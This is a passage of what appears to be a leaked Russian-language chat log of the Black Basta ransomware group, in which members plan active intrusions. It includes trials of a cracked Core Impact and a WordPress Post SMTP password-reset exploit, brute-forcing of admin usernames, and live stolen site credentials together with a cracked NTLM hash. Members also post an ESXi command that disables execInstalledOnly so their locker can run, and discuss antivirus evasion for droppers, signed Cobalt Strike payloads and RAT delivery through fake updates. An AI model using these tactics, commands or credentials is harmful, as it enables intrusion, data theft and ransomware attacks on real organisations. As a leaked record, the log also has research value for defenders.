BlackBasta Matrix Chat — страница 124 из 199
2024-02-15 02:26:42
@usernamenn:matrix.bestflowers247.online
нет, руками
2024-02-15 02:26:48
@usernamenn:matrix.bestflowers247.online
создал СИ шелл код
2024-02-15 02:26:51
@usernamenn:matrix.bestflowers247.online
который не bin
2024-02-15 02:26:53
@usernamenn:matrix.bestflowers247.online
а .C
2024-02-15 02:27:01
@usernamenn:matrix.bestflowers247.online
и сунул его в исходник
2024-02-15 02:27:01
Black Basta
так
2024-02-15 02:27:05
@usernamenn:matrix.bestflowers247.online
и скомпилировал exe
2024-02-15 02:27:17
Black Basta
а через какой клиент ?
2024-02-15 02:27:21
Black Basta
компилил
2024-02-15 02:27:28
@usernamenn:matrix.bestflowers247.online
mingw
2024-02-15 02:27:31
@usernamenn:matrix.bestflowers247.online
я же уже говорил это
2024-02-15 02:27:37
Black Basta
топ ё
2024-02-15 02:27:43
Black Basta
молодец хули
2024-02-15 02:27:44
Black Basta
ты голова
2024-02-15 02:28:06
@usernamenn:matrix.bestflowers247.online
даже ниче говорить не хочу
2024-02-15 02:28:07
@usernamenn:matrix.bestflowers247.online
в пизду
2024-02-15 02:28:14
Black Basta
> <@usernamenn:matrix.bestflowers247.online> я же уже говорил это
2024-02-15 02:28:27
@usernamenn:matrix.bestflowers247.online
я как обычно скажу что нахуй никому не надо нужно что то доказывать что бы сделалось то что прошу
2024-02-15 02:28:56
Black Basta
> <@usernamenn:matrix.bestflowers247.online> я как обычно скажу что нахуй никому не надо нужно что то доказывать что бы сделалось то что прошу
2024-02-15 02:29:14
@usernamenn:matrix.bestflowers247.online
да если бы у меня были знания програмирования и понимание как все устроено
2024-02-15 02:29:21
Black Basta
.c сделал засунут в mingw = exe и все ок
2024-02-15 02:29:23
Black Basta
круто
2024-02-15 02:29:25
@usernamenn:matrix.bestflowers247.online
у меня был бы интерес разобраться до истины и сделать чисто все
2024-02-15 02:29:49
@usernamess:matrix.bestflowers247.online
А у меня 42к объектов!
2024-02-15 02:30:12
Black Basta
> <@usernamenn:matrix.bestflowers247.online> да если бы у меня были знания програмирования и понимание как все устроено
2024-02-15 02:30:30
@usernamenn:matrix.bestflowers247.online
нужно найти кодера что бы разгрузить кодеров некоторых
2024-02-15 02:30:31
Black Basta
> <@usernamenn:matrix.bestflowers247.online> да если бы у меня были знания програмирования и понимание как все устроено
2024-02-15 02:31:00
Black Basta
> <@usernamenn:matrix.bestflowers247.online> нужно найти кодера что бы разгрузить кодеров некоторых
2024-02-15 02:31:22
@usernamenn:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> дак есть два кодера, нужно прям рядом с тобой одного посадить
2024-02-15 02:31:50
@usernamenn:matrix.bestflowers247.online
приезжай))
2024-02-15 06:53:54
Black Basta
ща капаться будем
2024-02-15 06:54:04
Black Basta
не начинайте ставить
2024-02-15 06:59:40
@lapa:matrix.bestflowers247.online
+
2024-02-15 06:59:55
@lapa:matrix.bestflowers247.online
AUTH_FROM_APOLLO_VALID_20240214.txt
2024-02-15 06:59:56
@lapa:matrix.bestflowers247.online
AUTH_VALID_20240214.txt
2024-02-15 07:16:44
Black Basta
AUTH_FROM_APOLLO_VALID_20240214.txt
2024-02-15 07:16:56
Black Basta
AUTH_VALID_20240214.txt
2024-02-15 07:18:31
@lapa:matrix.bestflowers247.online
запустил экспорт мыла и пасса для доменов от ситрикса, и запущу потом проверку на валид
2024-02-15 07:18:50
@lapa:matrix.bestflowers247.online
rdweb уже подзаканчиваются, так как мыло и пасс экспортнул
2024-02-15 07:18:58
@lapa:matrix.bestflowers247.online
может с брута еще немного будет
2024-02-15 07:19:08
@lapa:matrix.bestflowers247.online
а основном конечно это с мыла и пасса было
2024-02-15 07:30:10
Black Basta
> <@usernamegg:matrix.bestflowers247.online> тут он залил WordPress
2024-02-15 07:31:56
Black Basta
Wordpress_Post_Smtp_Mailer_Plugin_Authorization_Bypass_Exploit.7z
2024-02-15 07:32:12
Black Basta
```
2024-02-15 07:32:24
Black Basta
License and files for cracking procedure:
2024-02-15 07:32:56
Black Basta
Crack&License.7z
2024-02-15 07:33:12
Black Basta
Instructions for setup:
2024-02-15 07:33:22
Black Basta
CoreImpact_Instructions.7z
2024-02-15 07:34:13
Black Basta
Exploits:
2024-02-15 07:37:37
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> скачал ?
2024-02-15 07:37:57
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> http://temp.sh/GgLkd/onionshare_fpfppp.zip
2024-02-15 07:39:46
Black Basta
> <@usernamegg:matrix.bestflowers247.online> Exploits:
2024-02-15 07:40:07
Black Basta
> <@usernamegg:matrix.bestflowers247.online> ```
2024-02-15 07:40:21
@lapa:matrix.bestflowers247.online
через тор, не быстро
2024-02-15 07:40:50
Black Basta
The WordPress SMTP exloit is also here, and I have added also other exploits so that you can use if you want. You should exctract the update for exploits archive to: C:\ProgramData\IMPACT\ BUT ONLY AFTER the setup is successful.
2024-02-15 07:42:16
Black Basta
эксплойт выдали
2024-02-15 07:42:44
@lapa:matrix.bestflowers247.online
+
2024-02-15 07:55:16
@lapa:matrix.bestflowers247.online
ну как я понял, это штука сбрасывает пароль для пользователя wordpress
2024-02-15 07:55:53
Black Basta
скорее всего
2024-02-15 07:55:58
Black Basta
я не вникал
2024-02-15 07:57:14
@lapa:matrix.bestflowers247.online
ну я скриптик на питоне посмотрел этот
2024-02-15 07:57:26
@lapa:matrix.bestflowers247.online
короче скоро буду его переписывать под себя
2024-02-15 07:58:08
Black Basta
ну я так и думал
2024-02-15 07:58:31
Black Basta
на питоне разве не быстрее работать будет чем на пхп?
2024-02-15 07:58:31
@lapa:matrix.bestflowers247.online
короче видимо там сбрасывать пароль админа можно
2024-02-15 07:58:39
@lapa:matrix.bestflowers247.online
ну и потом заходишь в панель
2024-02-15 07:58:42
@lapa:matrix.bestflowers247.online
и делаешь что нужно
2024-02-15 07:58:53
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> на питоне разве не быстрее работать будет чем на пхп?
2024-02-15 07:58:57
@lapa:matrix.bestflowers247.online
он не многопоточный
2024-02-15 07:59:00
@lapa:matrix.bestflowers247.online
нифига
2024-02-15 07:59:06
@lapa:matrix.bestflowers247.online
и не будет он работать быстрее
2024-02-15 07:59:09
@lapa:matrix.bestflowers247.online
если соксы поставить
2024-02-15 07:59:20
@lapa:matrix.bestflowers247.online
вся скорость в соксы упирается часто
2024-02-15 07:59:29
@lapa:matrix.bestflowers247.online
но
2024-02-15 07:59:35
@lapa:matrix.bestflowers247.online
хорошо, мы пароль сбросили
2024-02-15 07:59:37
@lapa:matrix.bestflowers247.online
и что дальше?)
2024-02-15 07:59:53
Black Basta
аа
2024-02-15 07:59:56
@lapa:matrix.bestflowers247.online
мне же нужно будет как-то письма выкачивать
2024-02-15 08:00:13
Black Basta
согласен
2024-02-15 08:00:21
Black Basta
нам письма и нужны
2024-02-15 08:00:37
Black Basta
вопрос еще сколько скинуть сможем
2024-02-15 08:03:04
Black Basta
паролей
2024-02-15 08:03:09
@lapa:matrix.bestflowers247.online
+
2024-02-15 08:03:26
@lapa:matrix.bestflowers247.online
европу будем просылать?
2024-02-15 08:03:29
@lapa:matrix.bestflowers247.online
линки готовлю
2024-02-15 08:05:40
@lapa:matrix.bestflowers247.online
https://globalpanelinc.com/wnx/{random}
2024-02-15 08:07:50
Black Basta
да
2024-02-15 08:10:02
Black Basta
[22:35:36] private - coder - ldr: доброе утро, я уже заканчиваю, думаю через пару часов точно закончу по новой версии Экселя
2024-02-15 08:12:21
@lapa:matrix.bestflowers247.online
+
2024-02-15 08:40:37
@ssd:matrix.bestflowers247.online
privet
2024-02-15 08:41:03
@ssd:matrix.bestflowers247.online
mojet drygoy soft naydu , sert dash dla progruza?
2024-02-15 08:41:13
@ssd:matrix.bestflowers247.online
NNN privet
2024-02-15 08:43:33
Black Basta
?
2024-02-15 08:43:48
Black Basta
muaddib6:
2024-02-15 08:44:41
@lapa:matrix.bestflowers247.online
self.username = self.getParameters().get('USERNAME')
2024-02-15 08:44:43
@ssd:matrix.bestflowers247.online
> <@n3auxaxl:matrix.collectionofmanager.space> кароче беда есть в том, что msi палит в тупую
2024-02-15 08:44:58
@lapa:matrix.bestflowers247.online
тут уще для экспойта нужно указывать валидного пользователя wp
2024-02-15 08:45:30
@lapa:matrix.bestflowers247.online
а могут дать линк, на котором работает этот икспоит ?
2024-02-15 08:45:46
@lapa:matrix.bestflowers247.online
домен и имя пользователя дать
2024-02-15 08:45:54
Black Basta
думаю не
2024-02-15 08:46:06
Black Basta
надо искать самому тебе
2024-02-15 08:46:12
@lapa:matrix.bestflowers247.online
ну вот я ищу
2024-02-15 08:46:17
@lapa:matrix.bestflowers247.online
пока затуп на этом
2024-02-15 08:46:23
Black Basta
ща узнаю
2024-02-15 08:48:56
@lapa:matrix.bestflowers247.online
нужно будет еще имена пользователей перебирать
2024-02-15 08:49:05
@lapa:matrix.bestflowers247.online
я пока admin сделал, и чет не находит пока
2024-02-15 08:49:35
@lapa:matrix.bestflowers247.online
https://stleonardsbandb-blandford.co.uk/wp-login.php?action=lostpassword тут еще например вообще капча стоит
2024-02-15 08:50:24
@ssd:matrix.bestflowers247.online
внедри в свою разводку систему контроля версий и обновлений, доставляй чистый софт с разводкой, рат уже лей в обновлении
2024-02-15 08:50:35
@ssd:matrix.bestflowers247.online
но у меня работало так: есть лендос, на нем ехе с чистой программой, которая без рата и прочей малвари, программа эта должна уметь делать то, что заявлено на лендосе (чтоб не снесои софт в первые 5 минут). После установки программа требует обновления, они может произвестись в тихом режиме, так вот с обновлением программы ты жертве доставляешь обнову с ратом. У меня какое-то время была такая схема с виндой
2024-02-15 08:56:04
Black Basta
вот с капчей уже сложнее
2024-02-15 08:56:13
@lapa:matrix.bestflowers247.online
ну есть сервисы
2024-02-15 08:56:35
Black Basta
ну да
2024-02-15 09:08:48
@usernamehunter:matrix.bestflowers247.online
> <@usernamezz:matrix.bestflowers247.online> `b85cf405cfa1838227df928e1badb924`
2024-02-15 09:11:46
Black Basta
[01:01:29] LORD1 - Cob Meta: No. No. You don't need to specify anything. But you should run it from Core Impact.
2024-02-15 09:13:52
@lapa:matrix.bestflowers247.online
он не понял вопрос что-ль
2024-02-15 09:14:28
@lapa:matrix.bestflowers247.online
он может дать пару домен WP, где работает этот эксплоит?
2024-02-15 09:14:39
@lapa:matrix.bestflowers247.online
* он может дать пару доменов WP, где работает этот эксплоит?
2024-02-15 09:17:34
@muaddib6:matrix.org
делаю
2024-02-15 09:25:42
@ssd:matrix.bestflowers247.online
Дай своему партнеру почитать за Garble, разберется
2024-02-15 09:25:53
@ssd:matrix.bestflowers247.online
но опять таки, он на Go
2024-02-15 09:26:05
@ssd:matrix.bestflowers247.online
[01:18:30] malware: https://github.com/burrowers/garble
2024-02-15 09:26:16
@ssd:matrix.bestflowers247.online
Дай своему партнеру почитать за Garble, разберется
2024-02-15 09:39:58
@lapa:matrix.bestflowers247.online
### 2.8.11 ###
2024-02-15 09:40:04
@lapa:matrix.bestflowers247.online
https://stolofffamily.com/wp-content/plugins/post-smtp/readme.txt
2024-02-15 09:40:09
@lapa:matrix.bestflowers247.online
вот пример WP
2024-02-15 09:40:14
@lapa:matrix.bestflowers247.online
видно что одновляются
2024-02-15 09:40:32
@lapa:matrix.bestflowers247.online
исрпавили уязвимость
2024-02-15 09:40:33
@lapa:matrix.bestflowers247.online
= 2.8.11 - 2024-01-19 =
2024-02-15 09:43:27
Black Basta
обновляются
2024-02-15 09:43:29
Black Basta
видимо да
2024-02-15 09:43:35
Black Basta
ну это нормально
2024-02-15 09:44:05
@lapa:matrix.bestflowers247.online
ну я половину переписал эксплоита
2024-02-15 09:44:16
@lapa:matrix.bestflowers247.online
и уперся
2024-02-15 09:44:23
@lapa:matrix.bestflowers247.online
пока не могу подобрать пользователя
2024-02-15 09:44:39
Black Basta
ну представляю да
2024-02-15 09:44:57
@lapa:matrix.bestflowers247.online
этот чувак на чем проверял свой эксплоит?
2024-02-15 09:45:10
Black Basta
can you give me a couple of WP domains where this exploit works?
2024-02-15 09:48:20
Black Basta
так его спрошу
2024-02-15 09:48:34
Black Basta
он не сам пишет эксплойты
2024-02-15 09:48:44
Black Basta
он пперепродает
2024-02-15 09:48:49
Black Basta
* он перепродает
2024-02-15 09:49:10
@lapa:matrix.bestflowers247.online
+
2024-02-15 09:57:03
@usernameww:matrix.bestflowers247.online
`esxcli system settings advanced set -o /User/execInstalledOnly -i 0`
2024-02-15 10:06:46
@usernamett:matrix.bestflowers247.online
`64.176.219.106:45149 ACTIVE`
2024-02-15 10:12:43
@lapa:matrix.bestflowers247.online
я пока пустил тут в 300 потоков
2024-02-15 10:12:55
@lapa:matrix.bestflowers247.online
alex
2024-02-15 10:13:01
@lapa:matrix.bestflowers247.online
пока вот такие имена перебираю
2024-02-15 10:13:17
@lapa:matrix.bestflowers247.online
мне хотябы одиного найти, чтобы проверить точно ли работает эксплоит
2024-02-15 10:15:54
Black Basta
`esxcli system settings advanced set -o /User/execInstalledOnly -i 0`
2024-02-15 10:16:22
Black Basta
надо будет добавить в морду команду для того что бы можно было esxi лочить
2024-02-15 10:16:37
Black Basta
команду давать когда по root авторизация
2024-02-15 10:16:50
Black Basta
а то они на новых версиях доп защиту потсавили
2024-02-15 10:17:53
@lapa:matrix.bestflowers247.online
именно когда лочим?
2024-02-15 10:18:12
Black Basta
да
2024-02-15 10:18:23
Black Basta
не выключет esxi
2024-02-15 10:18:28
Black Basta
они работают
2024-02-15 10:18:33
Black Basta
локер ничего сделать не может
2024-02-15 10:18:41
Black Basta
сейчас добавим
2024-02-15 10:18:48
@usernameww:matrix.bestflowers247.online
++
2024-02-15 10:19:14
@usernameww:matrix.bestflowers247.online
там не долго ?
2024-02-15 10:19:20
@usernameww:matrix.bestflowers247.online
просто нам морда нужна будет
2024-02-15 10:19:23
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> `esxcli system settings advanced set -o /User/execInstalledOnly -i 0`
2024-02-15 10:19:25
@usernameww:matrix.bestflowers247.online
если найдем доступ
2024-02-15 10:19:32
@usernameww:matrix.bestflowers247.online
или отпиши как закончите
2024-02-15 10:19:35
@usernameww:matrix.bestflowers247.online
мы пока ищем
2024-02-15 10:19:40
Black Basta
перед подливом
2024-02-15 10:19:45
@lapa:matrix.bestflowers247.online
+
2024-02-15 10:19:46
Black Basta
как только авторизовался по root
2024-02-15 10:19:50
@lapa:matrix.bestflowers247.online
ок
2024-02-15 10:19:52
@lapa:matrix.bestflowers247.online
скоро сделаю
2024-02-15 10:19:56
Black Basta
++
2024-02-15 10:21:40
@lapa:matrix.bestflowers247.online
добавил
2024-02-15 10:27:45
Black Basta
++
2024-02-15 10:28:23
@n3auxaxl:matrix.collectionofmanager.space
https://4c5kb5ly.cofoundermanagerplatform.online/7e6375fd-0860-4a88-8d60-7beac46dd708/bot/33302
2024-02-15 10:28:27
@n3auxaxl:matrix.collectionofmanager.space
Привет
2024-02-15 10:28:29
@n3auxaxl:matrix.collectionofmanager.space
сетка дошла GB
2024-02-15 10:29:34
@n3auxaxl:matrix.collectionofmanager.space
и вот еще вернулась https://4c5kb5ly.cofoundermanagerplatform.online/7e6375fd-0860-4a88-8d60-7beac46dd708/bot/33130
2024-02-15 10:30:00
@usernamett:matrix.bestflowers247.online
64.176.219.106:33275
2024-02-15 10:34:36
@lapa:matrix.bestflowers247.online
hotdrake:zg415387287:http://albertkahingliu.com/wp-login.php
2024-02-15 10:34:43
@lapa:matrix.bestflowers247.online
в логах поискал доступы
2024-02-15 10:34:47
@lapa:matrix.bestflowers247.online
вот есть такой сайт
2024-02-15 10:34:55
@lapa:matrix.bestflowers247.online
когда нажимаю восставноить пароль
2024-02-15 10:35:12
@lapa:matrix.bestflowers247.online
http://albertkahingliu.com/wp-login.php?action=lostpassword
2024-02-15 10:35:13
@lapa:matrix.bestflowers247.online
вот тут
2024-02-15 10:35:18
@lapa:matrix.bestflowers247.online
ввожу hotdrake
2024-02-15 10:35:22
@lapa:matrix.bestflowers247.online
пользователя находит
2024-02-15 10:35:26
@lapa:matrix.bestflowers247.online
и просто на почту отправляет линк
2024-02-15 10:35:50
@lapa:matrix.bestflowers247.online
а в эксплоите, он из этого запроса вытаскиевает ключ
2024-02-15 10:36:00
@lapa:matrix.bestflowers247.online
но вот такого ключа я не вижу
2024-02-15 10:39:10
Black Basta
https://4c5kb5ly.cofoundermanagerplatform.online/7e6375fd-0860-4a88-8d60-7beac46dd708/bot/33302
2024-02-15 10:40:20
Black Basta
мелкор отчекал
2024-02-15 10:40:27
Black Basta
проверить надо
2024-02-15 10:40:34
@usernamess:matrix.bestflowers247.online
варота
2024-02-15 10:42:03
@lapa:matrix.bestflowers247.online
FCMValidDomains.txt
2024-02-15 10:42:24
@lapa:matrix.bestflowers247.online
вот домены, у которых __setFCMtoken еще работает
2024-02-15 10:42:36
@lapa:matrix.bestflowers247.online
пусть чувак проверит этот эксплоит на них
2024-02-15 10:42:39
Black Basta
закрыл
2024-02-15 10:42:43
@lapa:matrix.bestflowers247.online
потому что у меня не пашет
2024-02-15 10:44:54
Black Basta
смотри
2024-02-15 10:44:58
Black Basta
этот бург
2024-02-15 10:45:08
Black Basta
он ничего быстро не решит
2024-02-15 10:45:34
Black Basta
не он пишет эти эксплойты
2024-02-15 10:45:41
Black Basta
может лучше мелкора подключить
2024-02-15 10:45:43
Black Basta
?
2024-02-15 10:45:47
Black Basta
так
2024-02-15 10:45:53
@lapa:matrix.bestflowers247.online
можно
2024-02-15 10:45:54
Black Basta
я взял эксплойт
2024-02-15 10:46:02
Black Basta
ща
2024-02-15 10:46:50
@n3auxaxl:matrix.collectionofmanager.space
какой?
2024-02-15 10:47:04
Black Basta
для WP
2024-02-15 10:47:40
Black Basta
WordPress
2024-02-15 10:47:46
@n3auxaxl:matrix.collectionofmanager.space
чтобы слать с WP
2024-02-15 10:47:50
Black Basta
у нас пробблема
2024-02-15 10:47:51
@n3auxaxl:matrix.collectionofmanager.space
или получать всю инфу?
2024-02-15 10:47:59
Black Basta
надо помочь разобраться
2024-02-15 10:48:06
@n3auxaxl:matrix.collectionofmanager.space
давай
2024-02-15 10:48:14
@n3auxaxl:matrix.collectionofmanager.space
напиши задачу
2024-02-15 10:48:14
Black Basta
++
2024-02-15 10:53:21
@lapa:matrix.bestflowers247.online
а exe криптанули?
2024-02-15 10:53:25
Black Basta
hotdrake:zg415387287:http://albertkahingliu.com/wp-login.php
2024-02-15 10:53:27
@lapa:matrix.bestflowers247.online
dll *
2024-02-15 10:53:37
Black Basta
FCMValidDomains.txt
2024-02-15 10:53:43
Black Basta
вот домены, у которых __setFCMtoken еще работает
2024-02-15 10:53:52
Black Basta
делает
2024-02-15 10:55:22
Black Basta
вот сам эксплойт
2024-02-15 10:55:26
Black Basta
смотри
2024-02-15 10:56:01
Black Basta
License and files for cracking procedure:
2024-02-15 10:56:05
Black Basta
Crack&License.7z
2024-02-15 10:56:09
Black Basta
Instructions for setup:
2024-02-15 10:56:13
Black Basta
CoreImpact_Instructions.7z
2024-02-15 10:56:17
Black Basta
Exploits:
2024-02-15 10:56:26
Black Basta
https://file.io/1xUe9o6DkygW
2024-02-15 10:57:14
Black Basta
The WordPress SMTP exloit is also here, and I have added also other exploits so that you can use if you want. You should exctract the update for exploits archive to: C:\ProgramData\IMPACT\ BUT ONLY AFTER the setup is successful.
2024-02-15 10:58:07
Black Basta
вникай
2024-02-15 10:58:36
Black Basta
@lapa:matrix.bestflowers247.online
2024-02-15 10:58:40
Black Basta
добавь лапу его
2024-02-15 10:58:48
Black Basta
* добавь лапу
2024-02-15 10:58:55
Black Basta
он ковряет эксплойт этот
2024-02-15 11:02:57
@n3auxaxl:matrix.collectionofmanager.space
да, щас пару минут
2024-02-15 11:03:41
@lapa:matrix.bestflowers247.online
ReadMeValidaDomains.txt
2024-02-15 11:03:47
@lapa:matrix.bestflowers247.online
вот домены можете еще мелкору передать
2024-02-15 11:03:51
Black Basta
ReadMeValidaDomains.txt
2024-02-15 11:03:57
@lapa:matrix.bestflowers247.online
у которых есть смтп плагин этот
2024-02-15 11:04:06
@lapa:matrix.bestflowers247.online
но это не все конечно
2024-02-15 11:05:27
@n3auxaxl:matrix.collectionofmanager.space
> <@usernamegg:matrix.bestflowers247.online> https://file.io/1xUe9o6DkygW
2024-02-15 11:15:10
@n3auxaxl:matrix.collectionofmanager.space
> <@usernamegg:matrix.bestflowers247.online> sent a file.
2024-02-15 11:20:31
@lapa:matrix.bestflowers247.online
по идеи, ведь чувак который продал этот экспоит проверял же его?
2024-02-15 11:36:49
@usernamess:matrix.bestflowers247.online
> <@usernamess:matrix.bestflowers247.online> ```
2024-02-15 11:37:56
@usernameboy:matrix.bestflowers247.online
0
2024-02-15 11:44:33
@usernamemm:matrix.bestflowers247.online
`MEdelstein::BMT:1122334455667788:7cbc42051160d3d04675c78d22c369a7:0101000000000000da332a5b6c5fda01599a6d7a682fdff20000000008003000300000000000000000000000002000005afba3a7863b63fd732abb58135e7b9407fa5b2890f7772f929b293a35c94e920a0010000000000000000000000000000000000009001c0042004d0054005c004d004500640065006c0073007400650069006e000000000000000000`
2024-02-15 11:45:18
@lapa:matrix.bestflowers247.online
короче он нам херню мне кажется выдал
2024-02-15 11:45:27
@lapa:matrix.bestflowers247.online
https://github.com/UlyssesSaicha/CVE-2023-6875 я вот что еще нашел
2024-02-15 11:45:50
@lapa:matrix.bestflowers247.online
проверяю работает ли
2024-02-15 11:46:44
@lapa:matrix.bestflowers247.online
и вот это работает
2024-02-15 11:49:21
@burito:matrix.bestflowers247.online
щас
2024-02-15 11:53:28
@muaddib6:matrix.org
> <@n3auxaxl:matrix.collectionofmanager.space> sent a file.
2024-02-15 11:53:37
@muaddib6:matrix.org
1.7z
2024-02-15 11:53:56
@muaddib6:matrix.org
wNyaNTmziRahuqTIJucHsqTCukmQDZgPyOeDuPfjemGAUdJNJt
2024-02-15 11:54:32
@muaddib6:matrix.org
> <@usernamenn:matrix.bestflowers247.online> sent a file.
2024-02-15 11:54:44
@muaddib6:matrix.org
2.7z
2024-02-15 11:54:47
@n3auxaxl:matrix.collectionofmanager.space
сек, щас гляну
2024-02-15 11:57:32
@lapa:matrix.bestflowers247.online
> <@lapa:matrix.bestflowers247.online> https://github.com/UlyssesSaicha/CVE-2023-6875 я вот что еще нашел
2024-02-15 11:57:43
@lapa:matrix.bestflowers247.online
там провда без сброса пасса, но можно письма вытащить
2024-02-15 11:59:15
@n3auxaxl:matrix.collectionofmanager.space
Screenshot_2024-02-15_14-08-04.png
2024-02-15 12:00:09
@muaddib6:matrix.org
Это когда появляется?
2024-02-15 12:00:34
@n3auxaxl:matrix.collectionofmanager.space
после запуска команды regsvr32 /s dll_path
2024-02-15 12:00:47
@n3auxaxl:matrix.collectionofmanager.space
ну видимо после дропа оно не просканило его
2024-02-15 12:00:55
@n3auxaxl:matrix.collectionofmanager.space
потому что с монтированого диска его перенес
2024-02-15 12:01:00
@n3auxaxl:matrix.collectionofmanager.space
но думаю что статика это
2024-02-15 12:01:03
@muaddib6:matrix.org
На рантайм походит
2024-02-15 12:01:14
@n3auxaxl:matrix.collectionofmanager.space
щас сек, проверю переносом
2024-02-15 12:01:17
@n3auxaxl:matrix.collectionofmanager.space
минуту
2024-02-15 12:01:20
@muaddib6:matrix.org
поссле запуска детект. Переделаем еще конечно
2024-02-15 12:01:49
@n3auxaxl:matrix.collectionofmanager.space
ну там когда на меня идет детект, там пишет другое, там пишет Behaviour
2024-02-15 12:01:55
@n3auxaxl:matrix.collectionofmanager.space
а у меня бота даже не дропнуло просто
2024-02-15 12:02:02
@n3auxaxl:matrix.collectionofmanager.space
щас сек, проверю дропом именно
2024-02-15 12:02:05
@muaddib6:matrix.org
а dll_path что делает?
2024-02-15 12:02:19
@n3auxaxl:matrix.collectionofmanager.space
regsvr32 /s и путь к длке
2024-02-15 12:02:24
@n3auxaxl:matrix.collectionofmanager.space
ну по сути просто запуск ее
2024-02-15 12:02:30
@n3auxaxl:matrix.collectionofmanager.space
но до запуска не дошло
2024-02-15 12:02:43
@muaddib6:matrix.org
Ясно
2024-02-15 12:02:45
@n3auxaxl:matrix.collectionofmanager.space
оно сначала сканит длку и потом уже запускает ее
2024-02-15 12:03:00
@n3auxaxl:matrix.collectionofmanager.space
ну anti malware service не дает запустить что либо до первого скана
2024-02-15 12:03:09
@n3auxaxl:matrix.collectionofmanager.space
вот был первый скан, процесс regsvr32 еще нге появлися
2024-02-15 12:03:12
@n3auxaxl:matrix.collectionofmanager.space
а етект уже был
2024-02-15 12:03:36
@muaddib6:matrix.org
глянь плиз еще на дроп
2024-02-15 12:03:46
@n3auxaxl:matrix.collectionofmanager.space
да, сек
2024-02-15 12:04:04
@n3auxaxl:matrix.collectionofmanager.space
щас тачку обнулю
2024-02-15 12:04:15
@n3auxaxl:matrix.collectionofmanager.space
чтобы сигнатуры в локальной базе не было
2024-02-15 12:04:27
@muaddib6:matrix.org
+
2024-02-15 12:05:04
@usernamemm:matrix.bestflowers247.online
> <@usernamemm:matrix.bestflowers247.online> `MEdelstein::BMT:1122334455667788:7cbc42051160d3d04675c78d22c369a7:0101000000000000da332a5b6c5fda01599a6d7a682fdff20000000008003000300000000000000000000000002000005afba3a7863b63fd732abb58135e7b9407fa5b2890f7772f929b293a35c94e920a0010000000000000000000000000000000000009001c0042004d0054005c004d004500640065006c0073007400650069006e000000000000000000`
2024-02-15 12:05:40
@username777:matrix.bestflowers247.online
MEDELSTEIN::BMT:1122334455667788:7cbc42051160d3d04675c78d22c369a7:0101000000000000da332a5b6c5fda01599a6d7a682fdff20000000008003000300000000000000000000000002000005afba3a7863b63fd732abb58135e7b9407fa5b2890f7772f929b293a35c94e920a0010000000000000000000000000000000000009001c0042004d0054005c004d004500640065006c0073007400650069006e000000000000000000:x%XmcLp7
2024-02-15 12:05:47
@burito:matrix.bestflowers247.online
> <@n3auxaxl:matrix.collectionofmanager.space> dropper_GG21_TH_D_f0adda360d2b4ccda11468e026526576_pHw0N.zip
2024-02-15 12:05:47
@burito:matrix.bestflowers247.online
drs.7z
2024-02-15 12:06:20
@usernamemm:matrix.bestflowers247.online
))++
2024-02-15 12:06:51
@n3auxaxl:matrix.collectionofmanager.space
да, тот же самый детект
2024-02-15 12:06:54
@n3auxaxl:matrix.collectionofmanager.space
без запуска
2024-02-15 12:06:57
@n3auxaxl:matrix.collectionofmanager.space
просто дроп на тачку
2024-02-15 12:07:16
@n3auxaxl:matrix.collectionofmanager.space
> <@burito:matrix.bestflowers247.online> sent a file.
2024-02-15 12:07:27
@muaddib6:matrix.org
> <@n3auxaxl:matrix.collectionofmanager.space> просто дроп на тачку
2024-02-15 12:07:36
@burito:matrix.bestflowers247.online
привет, ок, проверю
2024-02-15 12:07:46
@burito:matrix.bestflowers247.online
вебрут это что-то новенькое)
2024-02-15 12:11:06
@burito:matrix.bestflowers247.online
> <@usernamenn:matrix.bestflowers247.online> cob9_443_x64.bin
2024-02-15 12:12:47
@usernamehunter:matrix.bestflowers247.online
> <@usernamess:matrix.bestflowers247.online> ???
2024-02-15 12:14:01
@username777:matrix.bestflowers247.online
> <@usernamess:matrix.bestflowers247.online> ```
2024-02-15 12:14:15
@n3auxaxl:matrix.collectionofmanager.space
> <@burito:matrix.bestflowers247.online> sent a file.
2024-02-15 12:14:21
@n3auxaxl:matrix.collectionofmanager.space
жду стук
2024-02-15 12:16:30
@burito:matrix.bestflowers247.online
> <@usernamenn:matrix.bestflowers247.online> cob9_443_x64.bin
2024-02-15 12:16:30
@burito:matrix.bestflowers247.online
cobs_signed.7z
2024-02-15 12:16:56
@burito:matrix.bestflowers247.online
строка длл dfhfghjhdfgnggnfgrghgghhghnggnhf
2024-02-15 12:23:35
@usernameww:matrix.bestflowers247.online
> <@usernameww:matrix.bestflowers247.online> sent a file.
2024-02-15 12:23:45
@muaddib6:matrix.org
Да.
2024-02-15 12:23:53
@muaddib6:matrix.org
Бензрпилой )
2024-02-15 12:23:54
@burito:matrix.bestflowers247.online
> <@usernameww:matrix.bestflowers247.online> эти пилите? burrito muaddib6
2024-02-15 12:24:01
@burito:matrix.bestflowers247.online
я ножовкой
2024-02-15 12:24:09
@burito:matrix.bestflowers247.online
поэтому долго
2024-02-15 12:24:10
@muaddib6:matrix.org
* Бензопилой )
2024-02-15 12:24:24
@usernameww:matrix.bestflowers247.online
> <@burito:matrix.bestflowers247.online> там вебрут?
2024-02-15 12:28:31
@ssd:matrix.bestflowers247.online
A shto esli nam vidavat na lende lnk/pdf
2024-02-15 12:29:04
@ssd:matrix.bestflowers247.online
[04:09:09] v: i can provide you with crypt bypass defender and smart screen
2024-02-15 12:29:22
@ssd:matrix.bestflowers247.online
[04:09:35] v: i will convert to ps1
2024-02-15 12:29:38
@n3auxaxl:matrix.collectionofmanager.space
все стучит
2024-02-15 12:29:40
@n3auxaxl:matrix.collectionofmanager.space
забыл отписать
2024-02-15 12:29:56
@ssd:matrix.bestflowers247.online
[04:17:24] 11_test: > [04:15:43] 11_test: example
2024-02-15 12:29:59
@burito:matrix.bestflowers247.online
> <@n3auxaxl:matrix.collectionofmanager.space> все стучит
2024-02-15 12:30:13
@ssd:matrix.bestflowers247.online
est kto delaet tAKOE
2024-02-15 12:30:36
@n3auxaxl:matrix.collectionofmanager.space
я это могу сделатьт
2024-02-15 12:30:37
@n3auxaxl:matrix.collectionofmanager.space
но толку в этом нет
2024-02-15 12:30:38
@n3auxaxl:matrix.collectionofmanager.space
все равно будет детект)))
2024-02-15 12:30:44
@n3auxaxl:matrix.collectionofmanager.space
ну 1 день может и нормально будет
